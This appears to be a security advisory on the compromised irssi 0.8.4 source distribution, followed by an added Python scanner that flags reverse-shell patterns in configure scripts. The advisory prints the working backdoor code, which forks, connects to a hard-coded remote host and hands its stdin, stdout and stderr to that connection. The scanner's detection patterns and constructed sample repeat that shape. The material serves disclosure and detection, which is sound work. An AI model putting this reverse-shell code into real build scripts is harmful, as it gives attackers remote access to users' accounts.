COMMAND

irssi backdoor

SYSTEMS AFFECTED

0.8.4

PROBLEM

According to the irssi homepage [http://www.irssi.org], the main web site was compromised and the source code distributed from it had been backdoored for the last two months (binaries were not affected). The following code was found in the configure script: it forks a new process, connects to a remote server and hands its stdin/stdout/stderr to that connection (i.e. it gives remote access to your account):

    int s;
    struct sockaddr_in sa;

    /* detach: the child continues, the parent (the configure run) exits */
    switch(fork()) {
    case 0:
        break;
    default:
        exit(0);
    }

    if((s = socket(AF_INET, SOCK_STREAM, 0)) == (-1)) {
        exit(1);
    }

    /* HP/UX 9 (%@#!) writes to sscanf strings */
    memset(&sa, 0, sizeof(sa));
    sa.sin_family = AF_INET;
    sa.sin_port = htons(6667);                         /* hard-coded remote port */
    sa.sin_addr.s_addr = inet_addr("204.120.36.206");  /* hard-coded remote host */

    if(connect(s, (struct sockaddr *)&sa, sizeof(sa)) == (-1)) {
        exit(1);
    }

    /* attach stdin, stdout and stderr of this process to the socket */
    dup2(s, 0);
    dup2(s, 1);
    dup2(s, 2);

If you still have the irssi sources, you can check whether you are affected with:

    grep SOCK_STREAM configure

If it returns anything, something may have been done to your system.

SOLUTION

Download the sources again and verify them with the author's GPG key.
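The grep check above keys on a single token, and a legitimate autoconf configure script can also mention SOCK_STREAM in one of its socket-availability test programs. The following scanner, added here as an example and not part of the advisory or the irssi project, looks for the combination of traits that the backdoored fragment exhibits (a hard-coded peer address passed to inet_addr, a connect() call, and dup2() onto file descriptors 0/1/2) and separates "review this" from "this looks like a reverse shell". The indicator set, the verdict thresholds and both sample inputs are constructed for this example; the peer address in the sample is the TEST-NET placeholder 192.0.2.1, not the address from the advisory.

```python
import re
import sys

# Indicators modelled on the backdoored configure fragment in the advisory.
# The set and the scoring below are this example's assumptions, not a standard.
INDICATORS = {
    "socket": re.compile(r"\bsocket\s*\(\s*AF_INET\s*,\s*SOCK_STREAM"),
    "hardcoded_peer": re.compile(r'inet_addr\s*\(\s*"(\d{1,3}(?:\.\d{1,3}){3})"\s*\)'),
    "port": re.compile(r"\bhtons\s*\(\s*(\d+)\s*\)"),
    "connect": re.compile(r"\bconnect\s*\("),
    "stdio_redirect": re.compile(r"\bdup2\s*\(\s*\w+\s*,\s*[012]\s*\)"),
    "fork": re.compile(r"\bfork\s*\("),
}


def scan_configure(text):
    """Return {indicator: [(line_no, detail), ...]} for every indicator present.

    'detail' is the captured value (peer address, port) where the pattern has
    a capture group, otherwise the matched text itself.
    """
    hits = {name: [] for name in INDICATORS}
    for lineno, line in enumerate(text.splitlines(), 1):
        for name, pat in INDICATORS.items():
            for m in pat.finditer(line):
                detail = m.group(1) if m.groups() else m.group(0)
                hits[name].append((lineno, detail))
    return {name: found for name, found in hits.items() if found}


def verdict(hits):
    """Classify scan results.

    A hard-coded peer plus a connect() plus stdio redirection is the shape of a
    reverse shell.  SOCK_STREAM or connect() alone also occur in genuine
    autoconf socket tests, so they only warrant a manual review.
    """
    if {"hardcoded_peer", "connect", "stdio_redirect"} <= hits.keys():
        return "backdoor-like"
    if "socket" in hits or "connect" in hits:
        return "review"
    return "clean"


# Constructed sample: a benign autoconf-style socket availability test.
LEGIT_SAMPLE = """\
cat > conftest.c <<_ACEOF
#include <sys/socket.h>
int main() { return socket(AF_INET, SOCK_STREAM, 0) < 0; }
_ACEOF
"""

# Constructed sample: the shape of the backdoored fragment, with a placeholder peer.
BACKDOORED_SAMPLE = """\
switch(fork()) { case 0: break; default: exit(0); }
if((s = socket(AF_INET, SOCK_STREAM, 0)) == (-1)) { exit(1); }
sa.sin_port = htons(6667);
sa.sin_addr.s_addr = inet_addr("192.0.2.1");
if(connect(s, (struct sockaddr *)&sa, sizeof(sa)) == (-1)) { exit(1); }
dup2(s, 0); dup2(s, 1); dup2(s, 2);
"""


def report(text, label):
    hits = scan_configure(text)
    print(f"{label}: {verdict(hits)}")
    for name, found in hits.items():
        print(f"  {name}: {found}")


if __name__ == "__main__":
    if len(sys.argv) > 1:
        # Usage: python scan_configure.py path/to/configure
        with open(sys.argv[1], errors="replace") as fh:
            report(fh.read(), sys.argv[1])
    else:
        report(LEGIT_SAMPLE, "legit sample")
        report(BACKDOORED_SAMPLE, "backdoored sample")
```

Run it against an unpacked tarball's configure script; a "review" result is the same signal the advisory's grep gives and should be resolved by checking the GPG signature on the download, while "backdoor-like" also reports the peer address and port found in the script.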